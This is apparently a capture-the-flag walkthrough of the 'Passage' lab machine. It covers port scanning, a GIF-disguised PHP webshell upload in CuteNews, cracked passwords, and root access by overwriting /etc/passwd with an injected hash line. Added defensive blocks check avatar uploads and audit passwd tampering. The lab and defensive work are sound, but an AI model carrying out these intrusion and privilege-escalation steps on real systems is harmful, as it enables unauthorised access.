As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command will quickly scan the target machine for open ports and save the output to a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of the nmap timing templates.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Tue May 17 20:21:13 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.206
Warning: 10.10.10.206 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.206
Host is up (0.061s latency).
Not shown: 65391 closed tcp ports (reset), 142 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Tue May 17 20:21:32 2022 -- 1 IP address (1 host up) scanned in 18.96 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command will scan these ports in more depth and save the result into a file:
nmap -sC -sV -p22,80 10.10.10.206 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Tue May 17 20:21:50 2022 as: nmap -sCV -p22,80 -Pn -oN targeted 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Passage News
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 17 20:22:02 2022 -- 1 IP address (1 host up) scanned in 11.67 seconds
If we scan the website with the whatweb tool, we'll see the passage.htb domain name in one of the emails. We can also see that the website is powered by CuteNews.
If we add /CuteNews to the URL, we'll see a login page.
http://10.10.10.206/CuteNews/
Let's register a new user.
Now, let's press on the Personal options button.
Then, we'll see that we can upload files. The idea here is to upload a PHP webshell as the Avatar of the user, then access it and have it send us a reverse shell. To be able to upload the PHP webshell, we'll have to upload it as a GIF. First, let's create the webshell.php file with the following content. The first line will indicate that the file is a GIF file.
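The upload check described above is satisfied by a GIF header alone. As an added example (mine, not code from the original post or from CuteNews), this is the stricter server-side validation a maintainer would want for an avatar upload: an extension allowlist, magic bytes that must match the extension, and a scan for a PHP open tag anywhere in the body; the sample files are constructed.

```python
import re

# Constructed samples: a valid 1x1 GIF, and a GIF header followed by a PHP tag
# (a harmless marker standing in for the kind of file the post describes).
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,"
             b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POLYGLOT_GIF = b"GIF89a;<?php /* constructed marker */ ?>"

# Magic bytes each allowed extension must start with.
MAGIC_BY_EXT = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
# "<?php" or the short echo tag "<?=", case-insensitive, anywhere in the file.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def check_avatar(filename: str, data: bytes) -> str:
    """Return 'ok' or the reason the upload should be rejected."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return "no extension"
    ext = parts[-1]
    # Reject php-like inner extensions (avatar.php.gif) so a handler that
    # picks the interpreter from any extension can never run the file.
    if any(p.startswith("php") or p == "phtml" for p in parts[:-1]):
        return "script extension in filename"
    if ext not in MAGIC_BY_EXT:
        return f"extension .{ext} not allowed"
    # The header must belong to the format the extension claims.
    if not data.startswith(MAGIC_BY_EXT[ext]):
        return "magic bytes do not match extension"
    # A valid image header does not make the rest of the file safe.
    if PHP_TAG.search(data):
        return "PHP open tag inside image data"
    return "ok"
```

Re-encoding the image with an image library before storing it is the stronger mitigation, since it discards everything that is not pixel data; the check above is the minimum that would have rejected the file the post uploads.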
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command on our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
By default, CuteNews stores the users' information in the /CuteNews/cdata/users/ directory, which contains the lines file with various information, including the password hashes. The following command will show that file and decode it.
If we put those hashes into CrackStation, we'll get the atlanta1 and egre55 passwords.
CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.
Now, we could try to become either the user paul or nadav with the passwords that we have. If we try the password atlanta1, we get a shell as paul. Then we can grab the user flag.
su paul
Password: atlanta1
paul@passage:/var/www/html/CuteNews/uploads$ whoami
paul
paul@passage:/var/www/html/CuteNews/uploads$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/uploads$ cd
paul@passage:~$ cat user.txt
d752ce000696474d0335721f1bcdea17
At this point, I started enumerating the machine, and I saw that the user nadav's SSH key is in the authorized_keys file, which means that we can log in via SSH as the user nadav without giving any password.
The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured.
ssh nadav@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ whoami
nadav
If we take a look at the hidden files of the nadav home directory, we'll see the .viminfo file.
explains how we can exploit this vulnerability, which basically allows us to copy a file with root permissions. The idea is to make a copy of the /etc/passwd file, modify it to change the root password, and finally replace the original /etc/passwd with it so we can become root. First, let's go to the /tmp folder and make a copy of the /etc/passwd file.
Now, we'll have to create a hash for the new password of the root user, which will be test.
openssl passwd
Password: test
Verifying - Password: test
P3RUTh5RKzvg6
Now, in the /etc/passwd copy, change the x character next to the root user to the password hash we just made.
root:P3RUTh5RKzvg6:0:0:root:/root:/bin/bash
Finally, if we run the following command, we will overwrite the original /etc/passwd file with our modified copy, and then we'll be able to get a shell as root.
Now, all we have to do is become the root user, reap the harvest and take the root flag.
su root
Password: test
root@passage:/tmp# whoami
root
root@passage:/tmp# cat /root/root.txt
72bcc6caaeb19b74b7fc6806858757c5
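A defender-side check for the tampering shown above, added here as an example (not part of the original writeup): parse /etc/passwd and flag any account whose password field carries a hash instead of the shadow placeholder, as the modified root:P3RUTh5RKzvg6:... entry does, along with empty password fields and extra UID 0 accounts. The sample file is constructed; only the root line mirrors the post.

```python
# Constructed /etc/passwd excerpt (not a real dump). The root line copies the
# tampered entry from the post; the others are ordinary shadowed entries.
SAMPLE_PASSWD = """\
root:P3RUTh5RKzvg6:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nadav:x:1000:1000:,,,:/home/nadav:/bin/bash
paul:x:1001:1001:,,,:/home/paul:/bin/bash
"""

# Values that legitimately appear in the password field on a shadowed system.
SHADOW_PLACEHOLDERS = ("x", "*", "!")


def audit_passwd(text: str) -> list:
    """Return (user, reason) pairs for entries that deviate from shadowed defaults."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, f"line {lineno}: malformed entry"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((user, "empty password field (passwordless login)"))
        elif pw not in SHADOW_PLACEHOLDERS:
            # A hash here is honoured by su/login and bypasses /etc/shadow.
            findings.append((user, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {reason}")
```

On a live host, run it over the real file and pair it with a file-integrity check on /etc/passwd, since the technique in the post replaces the whole file rather than editing it in place.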